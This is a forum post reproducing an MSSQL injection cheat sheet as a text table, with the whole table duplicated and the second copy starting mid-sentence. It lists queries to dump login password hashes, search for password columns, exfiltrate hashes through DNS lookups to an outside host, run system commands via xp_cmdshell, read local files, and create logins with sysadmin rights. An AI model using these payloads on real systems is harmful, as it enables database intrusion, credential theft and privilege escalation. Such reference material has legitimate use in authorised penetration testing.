Void
03-20-2015, 01:10 PM
** Some of the queries in the table below can only be run by an admin (SA Privilege).
These are marked with "-- priv" at the end of the query. **
+---------------+---------------------------------------------------------------------------+
| Version | SELECT @@version |
|---------------|---------------------------------------------------------------------------|
| Comments | SELECT 1 -- comment |
| | SELECT /*comment*/1 |
|---------------|---------------------------------------------------------------------------|
| | SELECT user_name(); |
| | SELECT system_user; |
| Current User | SELECT user; |
| | SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID |
|---------------|---------------------------------------------------------------------------|
| List Users | SELECT name FROM master..syslogins |
|---------------|---------------------------------------------------------------------------|
| | MSSQL2000: SELECT name, password FROM master..sysxlogins -- priv |
| | |
| | SELECT name, master.dbo.fn_varbintohexstr(password) |
| | FROM master..sysxlogins -- priv |
| List Password | |
| Hashes | MSSQL2005: SELECT name, password_hash FROM |
| | master.sys.sql_logins -- priv |
| | |
| | SELECT name + '-' + |
| | master.sys.fn_varbintohexstr(password_hash) |
| | FROM master.sys.sql_logins -- priv |
|---------------|---------------------------------------------------------------------------|
| | SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin? |
| | returns 1 for true, 0 for false, NULL for invalid role. |
| | Also try 'bulkadmin', 'systemadmin' and other values. |
| List DBA | |
| Accounts | |
| | SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? |
| | return 1 for true, 0 for false, NULL for invalid role/username. |
|---------------|---------------------------------------------------------------------------|
| Current DB | SELECT DB_NAME() |
|---------------|---------------------------------------------------------------------------|
| List | SELECT name FROM master..sysdatabases; |
| Databases | SELECT DB_NAME(N); -- for N = 0, 1, 2, ... |
|---------------|---------------------------------------------------------------------------|
| | SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE |
| | name = 'mytable'); -- for the current DB only |
| | |
| List Columns | SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM |
| | master..syscolumns, master..sysobjects WHERE |
| | master..syscolumns.id=master..sysobjects.id AND |
| | master..sysobjects.name='sometable'; -- list colum names |
| | and types for master..sometable |
|---------------|---------------------------------------------------------------------------|
| | SELECT name FROM master..sysobjects WHERE xtype = 'U'; |
| | (Use xtype = 'V' for views) |
| | SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U'; |
| | |
| List Tables | SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) |
| | FROM master..syscolumns, master..sysobjects WHERE |
| | master..syscolumns.id=master..sysobjects.id AND |
| | master..sysobjects.name='sometable'; -- list column names and types |
| | for master..sometable |
|---------------|---------------------------------------------------------------------------|
| | -- NB: This example works only for the current database. |
| | If you wan't to search another db, you need to specify the db name |
| Find Tables | (e.g. replace sysobject with mydb..sysobjects). |
| From | |
| Column Name | SELECT sysobjects.name as tablename, syscolumns.name as columnname |
| | FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id |
| | WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- |
| | this lists table, column for each column containing the word 'password' |
|---------------|---------------------------------------------------------------------------|
| Select | SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins |
| Nth Row | ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row |
|---------------|---------------------------------------------------------------------------|
|Select Nth Char| SELECT substring('abcd', 3, 1) -- returns c |
|---------------|---------------------------------------------------------------------------|
| Bitwise AND | SELECT 6 & 2 -- returns 2 |
| | SELECT 6 & 1 -- returns 0 |
|---------------|---------------------------------------------------------------------------|
| ASCII Value | SELECT char(0x41) -- returns A |
| -> Char | |
|---------------|---------------------------------------------------------------------------|
| Char -> ASCII | SELECT ascii('A') - returns 65 |
| Value | |
|---------------|---------------------------------------------------------------------------|
| Casting | SELECT CAST('1' as int); |
| | SELECT CAST(1 as char) |
|---------------|---------------------------------------------------------------------------|
| String | SELECT 'A' + 'B' - returns AB |
| Concatenation | |
|---------------|---------------------------------------------------------------------------|
| If Statement | IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1 |
|---------------|---------------------------------------------------------------------------|
|Case Statement | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1 |
|---------------|---------------------------------------------------------------------------|
|Avoiding Quotes| SELECT char(65)+char(66) -- returns AB |
|---------------|---------------------------------------------------------------------------|
| Time Delay | WAITFOR DELAY '0:0:5' -- pause for 5 seconds |
|---------------|---------------------------------------------------------------------------|
| | declare @host varchar(800); select @host = name FROM master..syslogins; |
| | exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); |
| | -- nonpriv, works on 2000 |
| | |
| | declare @host varchar(800); select @host = name + '-' + |
| Make | master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' |
| DNS Requests | from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');|
| | -- priv, works on 2005 |
| | |
| | -- NB: Concatenation is not allowed in calls to these SPs, hence why we |
| | have to use @host. Messy but necessary. |
| | -- Also check out theDNS tunnel feature of sqlninja |
|---------------|---------------------------------------------------------------------------|
| Command | EXEC xp_cmdshell 'net user'; -- priv |
| Execution | |
|---------------|---------------------------------------------------------------------------|
| Local | CREATE TABLE mydata (line varchar(8000)); |
| File Access | BULK INSERT mydata FROM 'c:\boot.ini'; |
| | DROP TABLE mydata; |
|---------------|---------------------------------------------------------------------------|
| Hostname, IP | SELECT HOST_NAME() |
|---------------|---------------------------------------------------------------------------|
| Create Users | EXEC sp_addlogin 'user', 'pass'; -- priv |
|---------------|---------------------------------------------------------------------------|
| Drop Users | EXEC sp_droplogin 'user'; -- priv |
|---------------|---------------------------------------------------------------------------|
| Make User DBA | EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; -- priv |
+---------------+---------------------------------------------------------------------------+
These are marked with "-- priv" at the end of the query. **
+---------------+---------------------------------------------------------------------------+
| Version | SELECT @@version |
|---------------|---------------------------------------------------------------------------|
| Comments | SELECT 1 -- comment |
| | SELECT /*comment*/1 |
|---------------|---------------------------------------------------------------------------|
| | SELECT user_name(); |
| | SELECT system_user; |
| Current User | SELECT user; |
| | SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID |
|---------------|---------------------------------------------------------------------------|
| List Users | SELECT name FROM master..syslogins |
|---------------|---------------------------------------------------------------------------|
| | MSSQL2000: SELECT name, password FROM master..sysxlogins -- priv |
| | |
| | SELECT name, master.dbo.fn_varbintohexstr(password) |
| | FROM master..sysxlogins -- priv |
| List Password | |
| Hashes | MSSQL2005: SELECT name, password_hash FROM |
| | master.sys.sql_logins -- priv |
| | |
| | SELECT name + '-' + |
| | master.sys.fn_varbintohexstr(password_hash) |
| | FROM master.sys.sql_logins -- priv |
|---------------|---------------------------------------------------------------------------|
| | SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin? |
| | returns 1 for true, 0 for false, NULL for invalid role. |
| | Also try 'bulkadmin', 'systemadmin' and other values. |
| List DBA | |
| Accounts | |
| | SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? |
| | return 1 for true, 0 for false, NULL for invalid role/username. |
|---------------|---------------------------------------------------------------------------|
| Current DB | SELECT DB_NAME() |
|---------------|---------------------------------------------------------------------------|
| List | SELECT name FROM master..sysdatabases; |
| Databases | SELECT DB_NAME(N); -- for N = 0, 1, 2, ... |
|---------------|---------------------------------------------------------------------------|
| | SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE |
| | name = 'mytable'); -- for the current DB only |
| | |
| List Columns | SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM |
| | master..syscolumns, master..sysobjects WHERE |
| | master..syscolumns.id=master..sysobjects.id AND |
| | master..sysobjects.name='sometable'; -- list colum names |
| | and types for master..sometable |
|---------------|---------------------------------------------------------------------------|
| | SELECT name FROM master..sysobjects WHERE xtype = 'U'; |
| | (Use xtype = 'V' for views) |
| | SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U'; |
| | |
| List Tables | SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) |
| | FROM master..syscolumns, master..sysobjects WHERE |
| | master..syscolumns.id=master..sysobjects.id AND |
| | master..sysobjects.name='sometable'; -- list column names and types |
| | for master..sometable |
|---------------|---------------------------------------------------------------------------|
| | -- NB: This example works only for the current database. |
| | If you wan't to search another db, you need to specify the db name |
| Find Tables | (e.g. replace sysobject with mydb..sysobjects). |
| From | |
| Column Name | SELECT sysobjects.name as tablename, syscolumns.name as columnname |
| | FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id |
| | WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- |
| | this lists table, column for each column containing the word 'password' |
|---------------|---------------------------------------------------------------------------|
| Select | SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins |
| Nth Row | ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row |
|---------------|---------------------------------------------------------------------------|
|Select Nth Char| SELECT substring('abcd', 3, 1) -- returns c |
|---------------|---------------------------------------------------------------------------|
| Bitwise AND | SELECT 6 & 2 -- returns 2 |
| | SELECT 6 & 1 -- returns 0 |
|---------------|---------------------------------------------------------------------------|
| ASCII Value | SELECT char(0x41) -- returns A |
| -> Char | |
|---------------|---------------------------------------------------------------------------|
| Char -> ASCII | SELECT ascii('A') - returns 65 |
| Value | |
|---------------|---------------------------------------------------------------------------|
| Casting | SELECT CAST('1' as int); |
| | SELECT CAST(1 as char) |
|---------------|---------------------------------------------------------------------------|
| String | SELECT 'A' + 'B' - returns AB |
| Concatenation | |
|---------------|---------------------------------------------------------------------------|
| If Statement | IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1 |
|---------------|---------------------------------------------------------------------------|
|Case Statement | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1 |
|---------------|---------------------------------------------------------------------------|
|Avoiding Quotes| SELECT char(65)+char(66) -- returns AB |
|---------------|---------------------------------------------------------------------------|
| Time Delay | WAITFOR DELAY '0:0:5' -- pause for 5 seconds |
|---------------|---------------------------------------------------------------------------|
| | declare @host varchar(800); select @host = name FROM master..syslogins; |
| | exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); |
| | -- nonpriv, works on 2000 |
| | |
| | declare @host varchar(800); select @host = name + '-' + |
| Make | master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' |
| DNS Requests | from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');|
| | -- priv, works on 2005 |
| | |
| | -- NB: Concatenation is not allowed in calls to these SPs, hence why we |
| | have to use @host. Messy but necessary. |
| | -- Also check out theDNS tunnel feature of sqlninja |
|---------------|---------------------------------------------------------------------------|
| Command | EXEC xp_cmdshell 'net user'; -- priv |
| Execution | |
|---------------|---------------------------------------------------------------------------|
| Local | CREATE TABLE mydata (line varchar(8000)); |
| File Access | BULK INSERT mydata FROM 'c:\boot.ini'; |
| | DROP TABLE mydata; |
|---------------|---------------------------------------------------------------------------|
| Hostname, IP | SELECT HOST_NAME() |
|---------------|---------------------------------------------------------------------------|
| Create Users | EXEC sp_addlogin 'user', 'pass'; -- priv |
|---------------|---------------------------------------------------------------------------|
| Drop Users | EXEC sp_droplogin 'user'; -- priv |
|---------------|---------------------------------------------------------------------------|
| Make User DBA | EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; -- priv |
+---------------+---------------------------------------------------------------------------+